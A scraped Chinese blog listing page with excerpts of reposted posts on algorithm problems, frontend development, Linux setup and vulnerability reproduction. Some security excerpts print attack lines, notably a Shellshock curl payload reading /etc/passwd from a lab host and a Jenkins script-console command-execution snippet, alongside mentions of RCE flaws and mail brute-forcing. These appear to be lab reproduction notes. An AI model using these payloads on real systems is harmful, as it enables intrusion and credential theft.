自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(4504)
  • 收藏
  • 关注

转载 浅谈斜率优化

DP模型形如\(f(i)=\max \{f(j)+w(i,j)\}\quad(1\le j<i)\)的dp状态转移方程,朴素的转移时间复杂度为\(O(n^2)\),如果\(w\)中不含i,j的乘积项,并且当i固定时\(w\)具有单调性,那么我们可以用单调队列优化转移,时间复杂度为\(O(n)\)如果\(w\)中含有i,j的乘积项,我们使用斜率优化优化状态转移【HNOI2008...

2019-10-06 20:16:00 288

转载 【SCOI2010】股票交易

Description【SCOI2010】股票交易在T天时间内,第\(i\)天股票购入价为\(ap_i\),出售价为\(bp_i\),每天最多购入\(as_i\)股,最多出售\(bs_i\)股任意时刻手中的股票数不能超过\(Maxp\),且两次交易至少间隔\(W\)天最大化收益,初始资金视为无限大Solution单调队列+dp根据题意不难设计状态,定义\(f[i][j]\)...

2019-10-02 20:05:00 281

转载 【NOIP2012】开车旅行

Description【NOIP2012】开车旅行(题面太长不想描述……)Solution由于题目很复杂,所以我们将这道题分成三个部分分析主要思路:dp+倍增+链表+离散化Step1:预处理出这两个人从每一个城市出发的下一个城市将这一步的答案记为$ga[i],gb[i]$城市高度差=城市间的距离考虑这两个人每一次需要选择离当前城市最近或者是第二近的城市...

2019-09-30 21:16:00 285

转载 emmm,加了密码是因为一些东西没有写好

只是置顶转载于:https://www.cnblogs.com/junsec/p/11607729.html

2019-09-29 14:34:00 181

转载 sqlmap tamper脚本备忘录与tamper脚本编写

查看sqlmap全部脚本$ python sqlmap.py --list-tampers使用方法--tamper=TAMPER2019.9更新后翻译* apostrophemask.py-用其UTF-8全角字符替换撇号(')(例如'->%EF%BC%87)* apostrophenullencode.py-用非法的双unicode替换撇号(...

2019-09-29 14:13:00 182

转载 Jenkins漏洞利用复现

一、未授权访问访问url:http://172.16.20.134:8080/script命令执行println "ls -al".execute().text也可以利用powershell 或者python脚本反弹shell二、CVE-2018-1000861远程命令执行漏洞payload...

2019-09-26 18:20:00 697

转载 JS代码静态分析及挖掘

JavaScript 已经成为现代 Web 浏览器开发中最普遍的技术之一。使用客户端 JavaScript 框架(如 AngularJS,ReactJS 和 Vue.js)构建的应用程序已向前端输送了大量功能和逻辑。随着客户端功能和逻辑的增加,客户端的攻击面也在逐渐增加。作为安全测试人员,必须了解这些应用程序的攻击面。对测试来说,了解要查找的信息,查找的位置以及如何查找那些能导致在应用程...

2019-09-24 15:53:00 1441

转载 网站打开提示Service Unavailable如何解决?

今日发现公司网站打开提示Service Unavailable经过检查发现是IIS的应用程序池状态停止的原因,开启IIS的应用程序池后解决。转载于:https://www.cnblogs.com/hujinbing/p/11578142.html...

2019-09-24 14:31:00 239

转载 【洛谷P1630】求和

Description【LuoguP1630】求和给定$a,b$,求$(\sum\limits_{i=1}^{a}{i^b})\mod 10000$多组询问,$a,b\le 1e9$Solution前缀和+快速幂如果暴力计算答案,那么时间复杂度为$O(Tab)$使用快速幂优化,那么时间复杂度为$O(Ta\log b)$考虑这样一个式子:$$i^b\mod ...

2019-09-23 19:44:00 201

转载 泛微 e-cology远程代码执行漏洞

影响版本:泛微 e-cology<=9.0漏洞分析:    问题出现在 resin 下 lib 中的 bsh.jar 文件里,问题类 bsh.servlet.BshServlet,可doGet 方法从 getParameter 中接收参数,Request 请求会交给evalScript 方法来进行处理。参数传递doGet--》getParameter--》ev...

2019-09-20 17:02:00 501

转载 Umi + Dva + Antd的React项目实践

记录一下最近项目所用到的技术React + Dva + Antd + umi ,以免忘记。之前没有用过它们其中一个,也是慢慢摸索,了解数据整个流程。先了解下概念React 不多说,3大框架之一;Dva 是由阿里架构师 sorrycc 带领 team 完成的一套前端框架,在作者的 github 里是这么描述它的:“dva 是 react 和 redux 的最佳实践”。现在已...

2019-09-18 16:55:00 438

转载 新手springmvc web简单搭建过程-caidachun

第一次做整了一天,中间各种报错,大佬肯定要嘲笑我了,但还是很有成就敢,现在只知道怎么装配,还不知道为什么,还需要学习、加油1.新建动态web项目2. 添加jar包,可以到网上下载,commons-logs.jar我是自己找的3.web.xml配置,classpath:springmvc.xml,指定初始化参数springmvc加载文件,需要在...

2019-09-18 09:55:00 75

转载 vue项目在IE下报 [vuex] vuex requires a Promise polyfill in this browser以及低版本系统客户端不兼容...

如下图所示,项目在IE11下打开报错:因为使用了 ES6 中用来传递异步消息的的Promise,而IE浏览器都不支持。解决方法:第一步: 安装 babel-polyfill 。 babel-polyfill可以模拟ES6使用的环境,可以使用ES6的所有新方法$ npm install --save babel-polyfillnpm WARN ajv-ke...

2019-09-16 16:46:00 180

转载 Parrot os安装docker及docker-compose

一、安装docker1、添加Docker pgp keycurl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -2、添加docker源echo -e 'deb https://download.docker.com/linux/debian stretch...

2019-09-16 11:30:00 284

转载 Parrot os更新内核及/boot空间清理

升级时发现boot,空间满了,卸载以前的内核,清理空间。如何升级内核请查看我上篇博客:https://www.cnblogs.com/junsec/p/11453049.html卸载多余内核,清理boot1、查看当前内核版本uname -a2、确定系统安装的header和imagedpkg --list|grep linux-image...

2019-09-16 10:28:00 308

转载 【洛谷P2034】选择数字

Description【洛谷P2034】选择数字给定一个序列,选择其中若干个数,但不能有超过k个连续的数字被选择。最大化选出的数字之和。Solutiondp+单调队列正难则反,考虑从序列中取出一些数,这些数两两之间的距离不超过k,最小化之和那么定义$f[i]$表示前i个数,取出一些的最小和(保证第i个取),那么显然有状态转移方程$$f[i]=\min\{f[j...

2019-09-14 21:28:00 239

转载 Shellshock漏洞复现

漏洞分析:exp:curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://172.16.20.134:8080/victim.cgi (){ } 代表bash函数 : bash中相当于python中的pass占位符 -A 自定义头部信息-H也是可以的 后面要执行的命令 漏洞成因调用了bas...

2019-09-11 16:08:00 252

转载 Cygwin下新版Tmux开启鼠标拖动窗口模式,开启横向纵向分屏

老版本的Tmux开启鼠标模式的方法:先按Ctrl + B, 松开以后,输入冒号,输入set mouse-mode on 回车。新版本取消了这条命令。在新版本中,开启鼠标模式的方法为:输入: tmux先按Ctrl + B, 松开以后,输入冒号,输入set -g mouse on 回车。------------------开启纵向分屏:Ctrl + B,Shif...

2019-09-10 19:39:00 165

转载 python面向对象——对象、类

一、类的定义    从逐步的构建类了解面线对象,class构建一个类。比如我们起的一个名字为student,类的命名规则:首字母大写,若有两个单词,两个单词首字母都大写,比如StudentHomework.  在类的内部我们可以定义变量,也可以定义一个函数,并且要是用这样一个类必须要将这个类给实例化:class Student(): name = "" ...

2019-09-06 11:23:00 88

转载 HTTP/2 简介及https原理

注:以下内容节选自《高性能浏览器网络》(出版社:O'Reilly,作者:Ilya Grigorik)。 要了解完整版本和相关内容,请访问hpbn.co。HTTP/2 可以让我们的应用更快、更简单、更稳定 - 这几词凑到一块是很罕见的!HTTP/2 将很多以前我们在应用中针对 HTTP/1.1 想出来的“歪招儿”一笔勾销,把解决那些问题的方案内置在了传输层中。 不仅如此,它...

2019-09-06 10:14:00 640

转载 100

100转载于:https://www.cnblogs.com/swefii/p/11462142.html

2019-09-04 22:55:00 105

转载 小程序canvas绘制base64数据格式图片

翻了微信小程序官方文档,看了看画板drawImage的用法,官方对所要绘制的图片资源路径并没有很详细,模棱两可,没说支持什么格式的路径。今天我就试一下支不支持base64格式的图片随便找张图片从网上base64转化小程序绘制功能着实搞好了剩下就是将所要绘制的图片资源替换成base64数据了,然后再工具上看效果绘制...

2019-09-04 10:02:00 1016

转载 Parrot os配置源更新

每次都是忘了怎么配置,去官网查文档,这记一下一、源文件配置注意首先要注意Parrot官方软件库的默认更新源文件不在/etc/apt/sources.list 而是/etc/apt/sources.list.d/parrot.list然后在下面地址选个离你近的源,添加进入上面文件,注释以前的源。https://docs.parrotli...

2019-09-03 14:56:00 2200

转载 element-ui Upload 上传组件源码分析整理笔记(十四)

简单写了部分注释,upload-dragger.vue(拖拽上传时显示此组件)、upload-list.vue(已上传文件列表)源码暂未添加多少注释,等有空再补充,先记下来...index.vue<script>import UploadList from './upload-list';import Upload from './upload';import El...

2019-09-02 17:45:00 828

转载 git命令之git remote的基本用法

    1.git remote 不带参数,列出已经存在的远程分支    2.git remote -v | --verbose列出详细信息,在每一个名字后面列出其远程url,此时, -v 选项(译注:此为 –verbose 的简写,取首字母),显示对应的克隆地址。    3.git remote add url 添加一个远程仓库转载于:https://www.cnbl...

2019-09-02 16:29:00 381

转载 【洛谷T96628】统计

Description给定$n$, $m$,求十进制$n$位数每个位数之积等于k的方案数Solutiondp+高精+数学考虑$k=0$的情况,由于可以有若干个$0$,所以方案数为$\sum\limits_{i=1}^{n}{n\choose m}\times 9^{n-i}$考虑另外的情况,我们将$k$分解质因数,如果$k$还有除了$2$,$3$,$5$,$7$之外的...

2019-08-31 06:43:00 139

转载 邮箱爆破

pop3,smtp协议爆破kali下的xhydra自己写的pop3爆破脚本 https://github.com/AdministratorGithub/pop3_crack转载于:https://www.cnblogs.com/junsec/p/11431402.html

2019-08-29 18:34:00 1297

转载 element-ui Rate组件源码分析整理笔记(十三)

Rate组件源码比较简单,有添加部分注释main.vue<template> <!--valuenow当前的评分 valuetext当前显示的文本--> <div class="el-rate" @keydown="handleKey" role="slider" :aria-valuenow="current...

2019-08-29 14:20:00 785

转载 Xshell 6+Xftp 6官方下载免费版

去官网下载学校家庭版本https://www.netsarang.com/zh/free-for-home-school/下载之后千万不要点升级,并保留安装包!不然又会显示评估期已过。转载于:https://www.cnblogs.com/jimz/p/11429248.html...

2019-08-29 13:40:00 174

转载 在vue里使用codemirror的两种用法

这是我自己做的一个左边点击对应的标题,右边显示相应代码的一个功能。代码显示这里用的是vue-codemirror插件。第一种用法:1、安装:npm install vue-codemirror --save2、在main.js中引入import VueCodeMirror from 'vue-codemirror'import 'codemirror/lib/codemirr...

2019-08-27 11:52:00 361

转载 解决使用elementUI框架el-upload跨域上传时session丢失问题

解决方法一:1、使用elementUI框架el-upload跨域上传时,后端获取不到cookie,后端接口显示未登录,在添加了 with-credentials="true"后依然不生效前端会报上面的错误,解决方式:后端把把*号改成httpServletRequest.getHeader("Origin")解决方法二:(该方法还存在问题,待完善)1、把config目录下的in...

2019-08-27 11:51:00 305

转载 【CF1207F】Remainder Problem

Description【CF1207F】Remainder Problem给定一个序列,支持如下操作:将$x$位置的值加上$y$求出$\sum\limits_{i\ mod\ x= y}{a_i}$的值Solution类似于分块的思路可以肯定,$O(n^2)$肯定是T飞了我们假设以T为界,预处理出模数小于T的答案,查询时如果模数小于T就直接返回,...

2019-08-24 10:22:00 119

转载 webmin RCE漏洞利用及分析

  Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。利用条件:webmin <=1.910原因:官网 SourceForge代码中存在漏洞,github代码中无漏洞,为后门植入,不得不佩服这些老外真会玩,看了一堆大神分析,自己简单记录下。前面参数传递暂时不提,看下面这段代码,在perl...

2019-08-23 19:24:00 317

转载 【CF1197D】Yet Another Subarray Problem

Description【CF1197D】Yet Another Subarray Problem给定一个序列和m,k,求出一个子序列使得$\sum\limits_{i=l}^{r}{a_i}-k\times \lceil \frac{r-l+1}{m}\rceil$最大特别地,一个长度为0的子序列的答案为0Solutiondp一段区间的区间和我们可以通过前缀和实现...

2019-08-23 15:48:00 101

转载 解决开了防火墙,无法ping通的问题

转载于:https://www.cnblogs.com/hujinbing/p/11395007.html

2019-08-22 16:14:00 2554

转载 【CF1206B】Make Product Equal One

Description给定一个整数序列,每次操作可以将某一个元素的值+1或-1,求最少需要多少次操作可以使得序列每个元素的乘积等于1Solutiondp一些数的乘积等于1,那么说明序列中一定只含有1或者是-1,而且-1出现的次数必须为偶数那么我们定义$f[i][1/0]$表示前$i$个数,一共有奇数/偶数个-1时的最小操作数是多少那么我们考虑转移如果我们让当前...

2019-08-21 23:11:00 178

转载 Hadoop Yarn REST API未授权漏洞利用

  Hadoop Yarn REST API未授权漏洞利用Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARN是hadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关...

2019-08-21 19:17:00 962

转载 Express 路由

路由路由是指应用程序的端点(URI)如何响应客户端请求。有关路由的介绍,请参阅基本路由。您可以使用Express app对象的方法定义路由,这些方法对应于HTTP方法; 例如,app.get()处理GET请求和app.post处理POST请求。有关完整列表,请参阅app.METHOD。您还可以使用app.all()来处理所有HTTP方法,并使用app.use()将中间件指定为...

2019-08-21 11:52:00 108

转载 苹果CEO乔布斯(Steve Jobs)20050612在斯坦福大学的演讲

http://hi.baidu.com/hieda/blog/item/b644a3f9e7b9a85f252df282.htmlSteve Jobs (Apple CEO)You've got to find what you love,' Jobs saysJobs说,你必须要找到你所爱的东西。This is the text of the Co...

2019-08-21 05:36:19 260

转载 【CF#581(Div.2)】A&B

date:2019.8.20我第一次打CF的比赛,感觉题目非常新颖并且非常棒,但是由于翻译软件不太给力所以我对题意的理解也不是很透彻,最后我做出了前两道题,感觉还可以吧A.Description给定一个用二进制表示的数n,求小于n的4的正整数次幂的个数其中$n\leq 2^{100}$Solution规律探索题显然暴力计算是不可取的我们观察一些性质,4...

2019-08-21 00:09:00 111

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除